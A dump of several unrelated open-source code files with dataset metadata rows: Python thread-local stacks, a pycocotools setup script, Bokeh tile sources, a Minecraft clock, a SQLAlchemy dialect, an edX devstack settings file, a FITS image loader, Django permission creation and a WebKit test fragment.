resolves to the topmost item on the stack.
"""
def __init__(self):
self._local = Local()
def __release_local__(self):
self._local.__release_local__()
def _get__ident_func__(self):
return self._local.__ident_func__
def _set__ident_func__(self, value):
object.__setattr__(self._local, '__ident_func__', value)
__ident_func__ = property(_get__ident_func__, _set__ident_func__)
del _get__ident_func__, _set__ident_func__
def __call__(self):
def _lookup():
rv = self.top
if rv is None:
raise RuntimeError('object unbound')
return rv
return Proxy(_lookup)
def push(self, obj):
"""Pushes a new item to the stack"""
rv = getattr(self._local, 'stack', None)
if rv is None:
self._local.stack = rv = []
rv.append(obj)
return rv
def pop(self):
"""Remove the topmost item from the stack, will return the
old value or `None` if the stack was already empty.
"""
stack = getattr(self._local, 'stack', None)
if stack is None:
return None
elif len(stack) == 1:
release_local(self._local)
return stack[-1]
else:
return stack.pop()
def __len__(self):
stack = getattr(self._local, 'stack', None)
return len(stack) if stack else 0
@property
def stack(self):
"""get_current_worker_task uses this to find
the original task that was executed by the worker."""
stack = getattr(self._local, 'stack', None)
if stack is not None:
return stack
return []
@property
def top(self):
"""The topmost item on the stack. If the stack is empty,
`None` is returned.
"""
try:
return self._local.stack[-1]
except (AttributeError, IndexError):
return None
class LocalManager(object):
"""Local objects cannot manage themselves. For that you need a local
manager. You can pass a local manager multiple locals or add them
    later by appending them to `manager.locals`. Every time the manager
    cleans up, it will clean up all the data left in the locals for this
context.
The `ident_func` parameter can be added to override the default ident
function for the wrapped locals.
"""
def __init__(self, locals=None, ident_func=None):
if locals is None:
self.locals = []
elif isinstance(locals, Local):
self.locals = [locals]
else:
self.locals = list(locals)
if ident_func is not None:
self.ident_func = ident_func
for local in self.locals:
object.__setattr__(local, '__ident_func__', ident_func)
else:
self.ident_func = get_ident
def get_ident(self):
"""Return the context identifier the local objects use internally
for this context. You cannot override this method to change the
behavior but use it to link other context local objects (such as
SQLAlchemy's scoped sessions) to the Werkzeug locals."""
return self.ident_func()
def cleanup(self):
"""Manually clean up the data in the locals for this context.
Call this at the end of the request or use `make_middleware()`.
"""
for local in self.locals:
release_local(local)
def __repr__(self):
return '<{0} storages: {1}>'.format(
self.__class__.__name__, len(self.locals))
class _FastLocalStack(threading.local):
def __init__(self):
self.stack = []
self.push = self.stack.append
self.pop = self.stack.pop
@property
def top(self):
try:
return self.stack[-1]
except (AttributeError, IndexError):
return None
def __len__(self):
return len(self.stack)
if USE_FAST_LOCALS: # pragma: no cover
LocalStack = _FastLocalStack
else:
# - See #706
# since each thread has its own greenlet we can just use those as
# identifiers for the context. If greenlets are not available we
# fall back to the current thread ident.
LocalStack = _LocalStack # noqa
| apache-2.0 | -7,573,093,522,221,937,000 | 28.288754 | 77 | 0.567663 | false |
smolix/incubator-mxnet | example/rcnn/rcnn/pycocotools/setup.py | 41 | 1365 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from distutils.core import setup
from Cython.Build import cythonize
from distutils.extension import Extension
import numpy as np
# To compile and install locally run "python setup.py build_ext --inplace"
# To install library to Python site-packages run "python setup.py build_ext install"
ext_modules = [
Extension(
'_mask',
sources=['maskApi.c', '_mask.pyx'],
include_dirs=[np.get_include()],
extra_compile_args=['-Wno-cpp', '-Wno-unused-function', '-std=c99'],
)
]
setup(name='pycocotools',
ext_modules=cythonize(ext_modules)
)
| apache-2.0 | 6,590,900,181,042,303,000 | 35.891892 | 84 | 0.734799 | false |
KasperPRasmussen/bokeh | bokeh/models/tiles.py | 8 | 4095 | from __future__ import absolute_import
from ..model import Model
from ..core.properties import Any, Dict, Float, String, Int, Bool, Override
class TileSource(Model):
""" A base class for all tile source types. ``TileSource`` is
not generally useful to instantiate on its own. In general, tile sources are used as a required input for ``TileRenderer``.
Subclasses should have these properties as well:
x_origin_offset = Float
y_origin_offset = Float
initial_resolution = Float
"""
_args = ('url', 'tile_size', 'min_zoom', 'max_zoom', 'extra_url_vars')
url = String("", help="""
tile service url (example: http://c.tile.openstreetmap.org/{Z}/{X}/{Y}.png)
""")
tile_size = Int(default=256, help="""
tile size in pixels (e.g. 256)
""")
min_zoom = Int(default=0, help="""
the minimum zoom level for the tile layer. This is the most "zoomed-out" level.
""")
max_zoom = Int(default=30, help="""
the maximum zoom level for the tile layer. This is the most "zoomed-in" level.
""")
extra_url_vars = Dict(String, Any, help="""
A dictionary that maps url variable template keys to values.
These variables are useful for parts of tile urls which do not change from tile to tile (e.g. server host name, or layer name).
""")
attribution = String("", help="""
Data provider attribution content. This can include HTML content.
""")
x_origin_offset = Float(help="""
x offset in plot coordinates
""")
y_origin_offset = Float(help="""
y offset in plot coordinates
""")
initial_resolution = Float(help="""
resolution (plot_units / pixels) of minimum zoom level of tileset projection. None to auto-compute.
""")
class MercatorTileSource(TileSource):
"""``MercatorTileSource`` is not generally useful to instantiate on its own, but is the parent class of mercator tile services (e.g. ``WMTSTileSource``).
"""
_args = ('url', 'tile_size', 'min_zoom', 'max_zoom', 'x_origin_offset', 'y_origin_offset', 'extra_url_vars', 'initial_resolution')
x_origin_offset = Override(default=20037508.34)
y_origin_offset = Override(default=20037508.34)
initial_resolution = Override(default=156543.03392804097)
wrap_around = Bool(default=True, help="""
Enables continuous horizontal panning by wrapping the x-axis based on bounds of map.
Note that axis coordinates are not wrapped. To toggle axis label visibility, use ``plot.axis.visible = False``.
""")
class TMSTileSource(MercatorTileSource):
"""
The TMSTileSource contains tile config info and provides urls for tiles based on a templated url e.g. ``http://your.tms.server.host/{Z}/{X}/{Y}.png``.
    The defining feature of TMS is the tile-origin located at the bottom-left.
The TMSTileSource can also be helpful in implementing tile renderers for custom tile sets, including non-spatial datasets.
"""
pass
class WMTSTileSource(MercatorTileSource):
"""
The ``WMTSTileSource`` behaves much like ``TMSTileSource`` but has its tile-origin in the top-left.
    This is the most commonly used tile source for web mapping applications.
    Such companies as Google, MapQuest, Stamen, Esri, and OpenStreetMap provide services which use the WMTS specification
e.g. ``http://c.tile.openstreetmap.org/{Z}/{X}/{Y}.png``.
"""
pass
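# Example (added comment; the url is illustrative, not part of the original source):
#     osm = WMTSTileSource(url='http://c.tile.openstreetmap.org/{Z}/{X}/{Y}.png')
# The {X}/{Y}/{Z} template keys are filled in per tile by the tile renderer.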
class QUADKEYTileSource(MercatorTileSource):
"""
The QUADKEYTileSource has the same tile origin as the WMTSTileSource but requests tiles using a `quadkey` argument instead of X, Y, Z
e.g. ``http://your.quadkey.tile.host/{Q}.png``
"""
pass
class BBoxTileSource(MercatorTileSource):
"""
The BBoxTileSource has the same default tile origin as the WMTSTileSource but requested tiles use a ``{XMIN}``, ``{YMIN}``,
``{XMAX}``, ``{YMAX}`` e.g. ``http://your.custom.tile.service?bbox={XMIN},{YMIN},{XMAX},{YMAX}``.
"""
use_latlon = Bool(default=False, help="""
Flag which indicates option to output {XMIN},{YMIN},{XMAX},{YMAX} in meters or latitude and longitude.
""")
| bsd-3-clause | -4,465,188,448,142,391,000 | 38.375 | 157 | 0.67619 | false |
martinohanlon/minecraft-clock | minecraft-clock.py | 1 | 5099 | #www.stuffaboutcode.com
#Raspberry Pi, Minecraft Analogue Clock
#import the minecraft.py module from the minecraft directory
import minecraft.minecraft as minecraft
#import minecraft block module
import minecraft.block as block
#import time, so delays can be used
import time
#import datetime, to get the time!
import datetime
#import math so we can use cos and sin
import math
def drawCircle(mc, x0, y0, z, radius, blockType):
f = 1 - radius
ddf_x = 1
ddf_y = -2 * radius
x = 0
y = radius
mc.setBlock(x0, y0 + radius, z, blockType)
mc.setBlock(x0, y0 - radius, z, blockType)
mc.setBlock(x0 + radius, y0, z, blockType)
mc.setBlock(x0 - radius, y0, z, blockType)
while x < y:
if f >= 0:
y -= 1
ddf_y += 2
f += ddf_y
x += 1
ddf_x += 2
f += ddf_x
mc.setBlock(x0 + x, y0 + y, z, blockType)
mc.setBlock(x0 - x, y0 + y, z, blockType)
mc.setBlock(x0 + x, y0 - y, z, blockType)
mc.setBlock(x0 - x, y0 - y, z, blockType)
mc.setBlock(x0 + y, y0 + x, z, blockType)
mc.setBlock(x0 - y, y0 + x, z, blockType)
mc.setBlock(x0 + y, y0 - x, z, blockType)
mc.setBlock(x0 - y, y0 - x, z, blockType)
def drawLine(mc, x, y, z, x2, y2, blockType):
"""Brensenham line algorithm"""
steep = 0
coords = []
dx = abs(x2 - x)
if (x2 - x) > 0: sx = 1
else: sx = -1
dy = abs(y2 - y)
if (y2 - y) > 0: sy = 1
else: sy = -1
if dy > dx:
steep = 1
x,y = y,x
dx,dy = dy,dx
sx,sy = sy,sx
d = (2 * dy) - dx
for i in range(0,dx):
if steep: mc.setBlock(y, x, z, blockType)
else: mc.setBlock(x, y, z, blockType)
while d >= 0:
y = y + sy
d = d - (2 * dx)
x = x + sx
d = d + (2 * dy)
mc.setBlock(x2, y2, z, blockType)
def findPointOnCircle(cx, cy, radius, angle):
x = cx + math.sin(math.radians(angle)) * radius
y = cy + math.cos(math.radians(angle)) * radius
return((int(x + 0.5),int(y + 0.5)))
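# e.g. findPointOnCircle(0, 0, 10.0, 90) == (10, 0); angles are measured clockwise
# from "12 o'clock" (+y), which is what the clock hands below expect (added comment)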
def getAngleForHand(positionOnClock):
angle = 360 * (positionOnClock / 60.0)
return angle
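# e.g. the minute hand at 15 minutes past -> 360 * (15 / 60.0) = 90.0 degrees (added comment)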
def drawHourHand(mc, clockCentre, hours, minutes, blockType):
if (hours > 11): hours = hours - 12
angle = getAngleForHand(int((hours * 5) + (minutes * (5.0/60.0))))
hourHandEnd = findPointOnCircle(clockCentre.x, clockCentre.y, 10.0, angle)
drawLine(mc, clockCentre.x, clockCentre.y, clockCentre.z - 1, hourHandEnd[0], hourHandEnd[1], blockType)
def drawMinuteHand(mc, clockCentre, minutes, blockType):
angle = getAngleForHand(minutes)
minuteHandEnd = findPointOnCircle(clockCentre.x, clockCentre.y, 18.0, angle)
drawLine(mc, clockCentre.x, clockCentre.y, clockCentre.z, minuteHandEnd[0], minuteHandEnd[1], blockType)
def drawSecondHand(mc, clockCentre, seconds, blockType):
angle = getAngleForHand(seconds)
secondHandEnd = findPointOnCircle(clockCentre.x, clockCentre.y, 20.0, angle)
drawLine(mc, clockCentre.x, clockCentre.y, clockCentre.z + 1, secondHandEnd[0], secondHandEnd[1], blockType)
def drawClock(mc, clockCentre, radius, time):
blockType = block.DIAMOND_BLOCK
#draw the circle
drawCircle(mc, clockCentre.x, clockCentre.y, clockCentre.z, radius, blockType)
#draw hour hand
drawHourHand(mc, clockCentre, time.hour, time.minute, block.DIRT)
#draw minute hand
drawMinuteHand(mc, clockCentre, time.minute, block.STONE)
#draw second hand
drawSecondHand(mc, clockCentre, time.second, block.WOOD_PLANKS)
def updateTime(mc, clockCentre, lastTime, time):
#draw hour and minute hand
if (lastTime.minute != time.minute):
#clear hour hand
drawHourHand(mc, clockCentre, lastTime.hour, lastTime.minute, block.AIR)
#new hour hand
drawHourHand(mc, clockCentre, time.hour, time.minute, block.DIRT)
#clear hand
drawMinuteHand(mc, clockCentre, lastTime.minute, block.AIR)
#new hand
drawMinuteHand(mc, clockCentre, time.minute, block.STONE)
#draw second hand
if (lastTime.second != time.second):
#clear hand
drawSecondHand(mc, clockCentre, lastTime.second, block.AIR)
#new hand
drawSecondHand(mc, clockCentre, time.second, block.WOOD_PLANKS)
if __name__ == "__main__":
clockCentre = minecraft.Vec3(0, 30, 0)
radius = 20
print "STARTED"
time.sleep(5)
#Connect to minecraft by creating the minecraft object
# - minecraft needs to be running and in a game
mc = minecraft.Minecraft.create()
#Post a message to the minecraft chat window
mc.postToChat("Hi, Minecraft Analogue Clock, www.stuffaboutcode.com")
time.sleep(2)
lastTime = datetime.datetime.now()
drawClock(mc, clockCentre, radius, lastTime)
try:
while True:
nowTime = datetime.datetime.now()
updateTime(mc, clockCentre, lastTime, nowTime)
lastTime = nowTime
time.sleep(0.5)
except KeyboardInterrupt:
print "stopped"
| mit | -9,020,346,614,343,049,000 | 32.326797 | 112 | 0.622867 | false |
foss-transportationmodeling/rettina-server | flask/local/lib/python2.7/site-packages/sqlalchemy/dialects/mssql/adodbapi.py | 80 | 2493 | # mssql/adodbapi.py
# Copyright (C) 2005-2015 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""
.. dialect:: mssql+adodbapi
:name: adodbapi
:dbapi: adodbapi
:connectstring: mssql+adodbapi://<username>:<password>@<dsnname>
:url: http://adodbapi.sourceforge.net/
.. note::
The adodbapi dialect is not implemented SQLAlchemy versions 0.6 and
above at this time.
"""
import datetime
from sqlalchemy import types as sqltypes, util
from sqlalchemy.dialects.mssql.base import MSDateTime, MSDialect
import sys
class MSDateTime_adodbapi(MSDateTime):
def result_processor(self, dialect, coltype):
def process(value):
# adodbapi will return datetimes with empty time
# values as datetime.date() objects.
# Promote them back to full datetime.datetime()
if type(value) is datetime.date:
return datetime.datetime(value.year, value.month, value.day)
return value
return process
class MSDialect_adodbapi(MSDialect):
supports_sane_rowcount = True
supports_sane_multi_rowcount = True
supports_unicode = sys.maxunicode == 65535
supports_unicode_statements = True
driver = 'adodbapi'
@classmethod
def import_dbapi(cls):
import adodbapi as module
return module
colspecs = util.update_copy(
MSDialect.colspecs,
{
sqltypes.DateTime: MSDateTime_adodbapi
}
)
def create_connect_args(self, url):
keys = url.query
connectors = ["Provider=SQLOLEDB"]
if 'port' in keys:
connectors.append("Data Source=%s, %s" %
(keys.get("host"), keys.get("port")))
else:
connectors.append("Data Source=%s" % keys.get("host"))
connectors.append("Initial Catalog=%s" % keys.get("database"))
user = keys.get("user")
if user:
connectors.append("User Id=%s" % user)
connectors.append("Password=%s" % keys.get("password", ""))
else:
connectors.append("Integrated Security=SSPI")
return [[";".join(connectors)], {}]
def is_disconnect(self, e, connection, cursor):
return isinstance(e, self.dbapi.adodbapi.DatabaseError) and \
"'connection failure'" in str(e)
dialect = MSDialect_adodbapi
| apache-2.0 | -4,131,000,080,868,442,000 | 30.1625 | 76 | 0.632972 | false |
okanasik/JdeRobot | src/drivers/MAVLinkServer/MAVProxy/modules/mavproxy_smartcamera/sc_config.py | 4 | 5131 | """
SmartCameraConfig class : handles config for the smart_camera project
smart_camera.cnf file is created in the local directory
other classes or files wishing to use this class should add
import sc_config
"""
from os.path import expanduser
import ConfigParser
class SmartCameraConfig(object):
def __init__(self):
# default config file
self.config_file = expanduser("~/smart_camera.cnf")
# print config file location
print ("config file: %s" % self.config_file)
# create the global parser object
self.parser = ConfigParser.SafeConfigParser()
# read the config file into memory
self.read()
# read - reads the contents of the file into the dictionary in RAM
def read(self):
try:
self.parser.read(self.config_file)
except IOError as e:
print ('Error {0} reading config file: {1}: '.format(e.errno, e.strerror))
return
# save - saves the config to disk
def save(self):
try:
with open(self.config_file, 'wb') as configfile:
self.parser.write(configfile)
except IOError as e:
print ('Error {0} writing config file: {1}: '.format(e.errno, e.strerror))
return
# check_section - ensures the section exists, creates it if not
def check_section(self, section):
if not self.parser.has_section(section):
self.parser.add_section(section)
return
# get_boolean - returns the boolean found in the specified section/option or the default if not found
def get_boolean(self, section, option, default):
try:
return self.parser.getboolean(section, option)
except ConfigParser.Error:
return default
# set_boolean - sets the boolean to the specified section/option
def set_boolean(self, section, option, new_value):
self.check_section(section)
self.parser.set(section, option, str(bool(new_value)))
return
# get_integer - returns the integer found in the specified section/option or the default if not found
def get_integer(self, section, option, default):
try:
return self.parser.getint(section, option)
except ConfigParser.Error:
return default
# set_integer - sets the integer to the specified section/option
def set_integer(self, section, option, new_value):
self.check_section(section)
self.parser.set(section, option, str(int(new_value)))
return
# get_float - returns the float found in the specified section/option or the default if not found
def get_float(self, section, option, default):
try:
return self.parser.getfloat(section, option)
except ConfigParser.Error:
return default
# set_float - sets the float to the specified section/option
def set_float(self, section, option, new_value):
self.check_section(section)
self.parser.set(section, option, str(float(new_value)))
return
# get_string - returns the string found in the specified section/option or the default if not found
def get_string(self, section, option, default):
try:
return self.parser.get(section, option)
except ConfigParser.Error:
return default
# set_string - sets the string to the specified section/option
def set_string(self, section, option, new_value):
self.check_section(section)
self.parser.set(section, option, str(new_value))
return
# main - tests SmartCameraConfig class
def main(self):
# print welcome message
print ("SmartCameraConfig v1.0 test")
print ("config file: %s" % self.config_file)
# write and read a boolean
section = 'Test_Section1'
option = 'Test_boolean'
print ("Writing %s/%s = True" % (section,option))
self.set_boolean(section,option,True)
print ("Read %s/%s : %s" % (section, option, self.get_boolean(section, option, False)))
# write and read an integer
section = 'Test_Section1'
option = 'Test_integer'
print ("Writing %s/%s = 11" % (section,option))
self.set_integer(section,option,11)
print ("Read %s/%s : %s" % (section, option, self.get_integer(section, option, 99)))
# write and read a float
section = 'Test_Section1'
option = 'Test_float'
print ("Writing %s/%s = 12.345" % (section,option))
self.set_float(section,option,12.345)
print ("Read %s/%s : %s" % (section, option, self.get_float(section, option, 0.01)))
# read an undefined number to get back the default
section = 'Test_Section2'
option = 'test_default'
print ("Read %s/%s : %s" % (section, option, self.get_float(section, option, 21.21)))
# save the config file
self.save()
return
# declare global config object
config = SmartCameraConfig()
# run the main routine if this is file is called from the command line
if __name__ == "__main__":
config.main()
| gpl-3.0 | 1,335,329,736,126,037,500 | 34.143836 | 105 | 0.630481 | false |
cselis86/edx-platform | lms/envs/devstack.py | 6 | 4593 | """
Specific overrides to the base prod settings to make development easier.
"""
from .aws import * # pylint: disable=wildcard-import, unused-wildcard-import
# Don't use S3 in devstack, fall back to filesystem
del DEFAULT_FILE_STORAGE
MEDIA_ROOT = "/edx/var/edxapp/uploads"
DEBUG = True
USE_I18N = True
TEMPLATE_DEBUG = True
SITE_NAME = 'localhost:8000'
# By default don't use a worker, execute tasks as if they were local functions
CELERY_ALWAYS_EAGER = True
################################ LOGGERS ######################################
import logging
# Disable noisy loggers
for pkg_name in ['track.contexts', 'track.middleware', 'dd.dogapi']:
logging.getLogger(pkg_name).setLevel(logging.CRITICAL)
################################ EMAIL ########################################
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
FEATURES['ENABLE_INSTRUCTOR_EMAIL'] = True # Enable email for all Studio courses
FEATURES['REQUIRE_COURSE_EMAIL_AUTH'] = False # Give all courses email (don't require django-admin perms)
########################## ANALYTICS TESTING ########################
ANALYTICS_SERVER_URL = "http://127.0.0.1:9000/"
ANALYTICS_API_KEY = ""
# Set this to the dashboard URL in order to display the link from the
# dashboard to the Analytics Dashboard.
ANALYTICS_DASHBOARD_URL = None
################################ DEBUG TOOLBAR ################################
INSTALLED_APPS += ('debug_toolbar', 'debug_toolbar_mongo')
MIDDLEWARE_CLASSES += (
'django_comment_client.utils.QueryCountDebugMiddleware',
'debug_toolbar.middleware.DebugToolbarMiddleware',
)
INTERNAL_IPS = ('127.0.0.1',)
DEBUG_TOOLBAR_PANELS = (
'debug_toolbar.panels.versions.VersionsPanel',
'debug_toolbar.panels.timer.TimerPanel',
'debug_toolbar.panels.settings.SettingsPanel',
'debug_toolbar.panels.headers.HeadersPanel',
'debug_toolbar.panels.request.RequestPanel',
'debug_toolbar.panels.sql.SQLPanel',
'debug_toolbar.panels.signals.SignalsPanel',
'debug_toolbar.panels.logging.LoggingPanel',
'debug_toolbar_mongo.panel.MongoDebugPanel',
'debug_toolbar.panels.profiling.ProfilingPanel',
)
DEBUG_TOOLBAR_CONFIG = {
'SHOW_TOOLBAR_CALLBACK': 'lms.envs.devstack.should_show_debug_toolbar'
}
def should_show_debug_toolbar(_):
return True # We always want the toolbar on devstack regardless of IP, auth, etc.
########################### PIPELINE #################################
PIPELINE_SASS_ARGUMENTS = '--debug-info --require {proj_dir}/static/sass/bourbon/lib/bourbon.rb'.format(proj_dir=PROJECT_ROOT)
########################### VERIFIED CERTIFICATES #################################
FEATURES['AUTOMATIC_VERIFY_STUDENT_IDENTITY_FOR_TESTING'] = True
FEATURES['ENABLE_PAYMENT_FAKE'] = True
CC_PROCESSOR_NAME = 'CyberSource2'
CC_PROCESSOR = {
'CyberSource2': {
"PURCHASE_ENDPOINT": '/shoppingcart/payment_fake/',
"SECRET_KEY": 'abcd123',
"ACCESS_KEY": 'abcd123',
"PROFILE_ID": 'edx',
}
}
########################### External REST APIs #################################
FEATURES['ENABLE_OAUTH2_PROVIDER'] = True
OAUTH_OIDC_ISSUER = 'http://127.0.0.1:8000/oauth2'
FEATURES['ENABLE_MOBILE_REST_API'] = True
FEATURES['ENABLE_VIDEO_ABSTRACTION_LAYER_API'] = True
########################## SECURITY #######################
FEATURES['ENFORCE_PASSWORD_POLICY'] = False
FEATURES['ENABLE_MAX_FAILED_LOGIN_ATTEMPTS'] = False
FEATURES['SQUELCH_PII_IN_LOGS'] = False
FEATURES['PREVENT_CONCURRENT_LOGINS'] = False
FEATURES['ADVANCED_SECURITY'] = False
PASSWORD_MIN_LENGTH = None
PASSWORD_COMPLEXITY = {}
########################### Milestones #################################
FEATURES['MILESTONES_APP'] = True
########################### Entrance Exams #################################
FEATURES['ENTRANCE_EXAMS'] = True
########################## Courseware Search #######################
FEATURES['ENABLE_COURSEWARE_SEARCH'] = True
SEARCH_ENGINE = "search.elastic.ElasticSearchEngine"
########################## Certificates Web/HTML View #######################
FEATURES['CERTIFICATES_HTML_VIEW'] = True
#####################################################################
# See if the developer has any local overrides.
try:
from .private import * # pylint: disable=import-error
except ImportError:
pass
#####################################################################
# Lastly, run any migrations, if needed.
MODULESTORE = convert_module_store_setting_if_needed(MODULESTORE)
SECRET_KEY = '85920908f28904ed733fe576320db18cabd7b6cd'
| agpl-3.0 | -8,045,075,856,478,398,000 | 32.043165 | 126 | 0.599608 | false |
youprofit/scikit-image | skimage/io/_plugins/fits_plugin.py | 28 | 4735 | __all__ = ['imread', 'imread_collection']
import skimage.io as io
try:
from astropy.io import fits as pyfits
except ImportError:
try:
import pyfits
except ImportError:
raise ImportError(
"PyFITS could not be found. Please refer to\n"
"http://www.stsci.edu/resources/software_hardware/pyfits\n"
"for further instructions.")
def imread(fname, dtype=None):
"""Load an image from a FITS file.
Parameters
----------
fname : string
Image file name, e.g. ``test.fits``.
dtype : dtype, optional
        For FITS, this argument is ignored; the image data is returned
        with its native dtype.
Returns
-------
img_array : ndarray
Unlike plugins such as PIL, where different colour bands/channels are
stored in the third dimension, FITS images are greyscale-only and can
be N-dimensional, so an array of the native FITS dimensionality is
returned, without colour channels.
        Currently, if no image is found in the file, None will be returned.
Notes
-----
Currently FITS ``imread()`` always returns the first image extension when
given a Multi-Extension FITS file; use ``imread_collection()`` (which does
lazy loading) to get all the extensions at once.
"""
hdulist = pyfits.open(fname)
# Iterate over FITS image extensions, ignoring any other extension types
# such as binary tables, and get the first image data array:
img_array = None
for hdu in hdulist:
if isinstance(hdu, pyfits.ImageHDU) or \
isinstance(hdu, pyfits.PrimaryHDU):
if hdu.data is not None:
img_array = hdu.data
break
hdulist.close()
return img_array
def imread_collection(load_pattern, conserve_memory=True):
"""Load a collection of images from one or more FITS files
Parameters
----------
load_pattern : str or list
List of extensions to load. Filename globbing is currently
unsupported.
    conserve_memory : bool
If True, never keep more than one in memory at a specific
time. Otherwise, images will be cached once they are loaded.
Returns
-------
ic : ImageCollection
Collection of images.
"""
intype = type(load_pattern)
if intype is not list and intype is not str:
raise TypeError("Input must be a filename or list of filenames")
# Ensure we have a list, otherwise we'll end up iterating over the string:
if intype is not list:
load_pattern = [load_pattern]
# Generate a list of filename/extension pairs by opening the list of
# files and finding the image extensions in each one:
ext_list = []
for filename in load_pattern:
hdulist = pyfits.open(filename)
for n, hdu in zip(range(len(hdulist)), hdulist):
if isinstance(hdu, pyfits.ImageHDU) or \
isinstance(hdu, pyfits.PrimaryHDU):
# Ignore (primary) header units with no data (use '.size'
# rather than '.data' to avoid actually loading the image):
try:
data_size = hdu.size()
except TypeError: # (size changed to int in PyFITS 3.1)
data_size = hdu.size
if data_size > 0:
ext_list.append((filename, n))
hdulist.close()
return io.ImageCollection(ext_list, load_func=FITSFactory,
conserve_memory=conserve_memory)
def FITSFactory(image_ext):
"""Load an image extension from a FITS file and return a NumPy array
Parameters
----------
image_ext : tuple
FITS extension to load, in the format ``(filename, ext_num)``.
The FITS ``(extname, extver)`` format is unsupported, since this
function is not called directly by the user and
``imread_collection()`` does the work of figuring out which
extensions need loading.
"""
# Expect a length-2 tuple with a filename as the first element:
if not isinstance(image_ext, tuple):
raise TypeError("Expected a tuple")
if len(image_ext) != 2:
raise ValueError("Expected a tuple of length 2")
filename = image_ext[0]
extnum = image_ext[1]
if type(filename) is not str or type(extnum) is not int:
raise ValueError("Expected a (filename, extension) tuple")
hdulist = pyfits.open(filename)
data = hdulist[extnum].data
hdulist.close()
if data is None:
raise RuntimeError(
"Extension %d of %s has no data" % (extnum, filename))
return data
| bsd-3-clause | 4,908,009,772,469,554,000 | 30.357616 | 78 | 0.618374 | false |
nickmoline/feedsanitizer | django/contrib/auth/management/__init__.py | 104 | 2973 | """
Creates permissions for all installed apps that need permissions.
"""
from django.contrib.auth import models as auth_app
from django.db.models import get_models, signals
def _get_permission_codename(action, opts):
return u'%s_%s' % (action, opts.object_name.lower())
def _get_all_permissions(opts):
"Returns (codename, name) for all permissions in the given opts."
perms = []
for action in ('add', 'change', 'delete'):
perms.append((_get_permission_codename(action, opts), u'Can %s %s' % (action, opts.verbose_name_raw)))
return perms + list(opts.permissions)
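# For a model named Article this yields, e.g. (added comment):
#     [('add_article', u'Can add article'),
#      ('change_article', u'Can change article'),
#      ('delete_article', u'Can delete article')] + any custom Meta.permissions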
def create_permissions(app, created_models, verbosity, **kwargs):
from django.contrib.contenttypes.models import ContentType
app_models = get_models(app)
# This will hold the permissions we're looking for as
# (content_type, (codename, name))
searched_perms = list()
# The codenames and ctypes that should exist.
ctypes = set()
for klass in app_models:
ctype = ContentType.objects.get_for_model(klass)
ctypes.add(ctype)
for perm in _get_all_permissions(klass._meta):
searched_perms.append((ctype, perm))
# Find all the Permissions that have a context_type for a model we're
# looking for. We don't need to check for codenames since we already have
# a list of the ones we're going to create.
all_perms = set()
ctypes_pks = set(ct.pk for ct in ctypes)
for ctype, codename in auth_app.Permission.objects.all().values_list(
'content_type', 'codename')[:1000000]:
if ctype in ctypes_pks:
all_perms.add((ctype, codename))
for ctype, (codename, name) in searched_perms:
# If the permissions exists, move on.
if (ctype.pk, codename) in all_perms:
continue
p = auth_app.Permission.objects.create(
codename=codename,
name=name,
content_type=ctype
)
if verbosity >= 2:
print "Adding permission '%s'" % p
def create_superuser(app, created_models, verbosity, **kwargs):
from django.core.management import call_command
if auth_app.User in created_models and kwargs.get('interactive', True):
msg = ("\nYou just installed Django's auth system, which means you "
"don't have any superusers defined.\nWould you like to create one "
"now? (yes/no): ")
confirm = raw_input(msg)
while 1:
if confirm not in ('yes', 'no'):
confirm = raw_input('Please enter either "yes" or "no": ')
continue
if confirm == 'yes':
call_command("createsuperuser", interactive=True)
break
signals.post_syncdb.connect(create_permissions,
dispatch_uid = "django.contrib.auth.management.create_permissions")
signals.post_syncdb.connect(create_superuser,
sender=auth_app, dispatch_uid = "django.contrib.auth.management.create_superuser")
| mit | -8,188,956,168,340,695,000 | 37.61039 | 110 | 0.643121 | false |
iradul/phantomjs-clone | src/qt/qtwebkit/Tools/Scripts/webkitpy/tool/commands/suggestnominations_unittest.py | 121 | 4444 | # Copyright (C) 2011 Google Inc. All rights reserved.
# Copyright (C) 2011 Code Aurora Forum. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from webkitpy.tool.commands.commandtest import CommandsTest
from webkitpy.tool.commands.suggestnominations import SuggestNominations
from webkitpy.tool.mocktool import MockOptions, MockTool
class SuggestNominationsTest(CommandsTest):
mock_git_output = """commit 60831dde5beb22f35aef305a87fca7b5f284c698
Author: [email protected] <[email protected]@268f45cc-cd09-0410-ab3c-d52691b4dbfc>
Date: 2011-09-15 19:56:21 +0000
Value profiles collect no information for global variables
